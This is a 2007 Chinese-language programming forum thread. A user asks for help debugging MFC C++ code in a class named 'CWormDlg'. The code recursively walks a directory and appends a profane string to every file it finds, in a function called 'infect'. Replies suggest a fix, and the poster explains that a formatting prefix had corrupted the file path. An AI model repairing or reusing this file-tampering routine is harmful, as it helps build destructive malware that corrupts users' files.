首页
社区
课程
招聘
[求助]Help !!!!!!!!!!!!!!
发表于: 2007-7-1 17:50 3659

[求助]Help !!!!!!!!!!!!!!

2007-7-1 17:50
3659

void CWormDlg::OnFindFile()
{
// TODO: Add your control notification handler code here
CString xiaohao;
xiaohao="c:\\Test\\";
BrowseDir(xiaohao);
}

void CWormDlg::BrowseDir(CString strDir)
{
CFileFind ff;
CString szDir = strDir;

if(szDir.Right(1)!="\\")
szDir+="\\";
szDir+="*.*";


BOOL res = ff.FindFile(szDir);
while(res)
{
res = ff.FindNextFile();
if(ff.IsDirectory()&&!ff.IsDots())
{
BrowseDir(ff.GetFilePath());
}
else if(!ff.IsDirectory() && !ff.IsDots())
{
CString str;
str.Format("当前访问的文件:%s",ff.GetFilePath());

GanRan(str);
MessageBox(str);
}
}
ff.Close();
}

void CWormDlg::GanRan(CString Name)
{

CString str;
CString WriteBuf="Fuck you\r\n";
str = Name;
MessageBox(str);
CFile file;
file.Open(str,CFile::modeNoTruncate | CFile::modeWrite);
file.SeekToEnd();
file.Write(WriteBuf,WriteBuf.GetLength());
file.Close();
}


报错 ..   这代码哪错了

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (4)
雪    币: 2384
活跃值: (766)
能力值: (RANK:410 )
在线值:
发帖
回帖
粉丝
2
这样?
xiaohao="c:\\\\Test\\\\";
2007-7-1 18:56
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
急  调了N久了
2007-7-1 19:54
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
           
2007-7-2 15:52
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
搞定了 str.Format("当前访问的文件:%s",ff.GetFilePath());

str + 当前文件甲+path 怎么可能 建立数据流呢.. 我太大意了.. 太粗心了 希望大家别向我一样
2007-7-2 20:40
0
游客
登录 | 注册 方可回帖
返回
//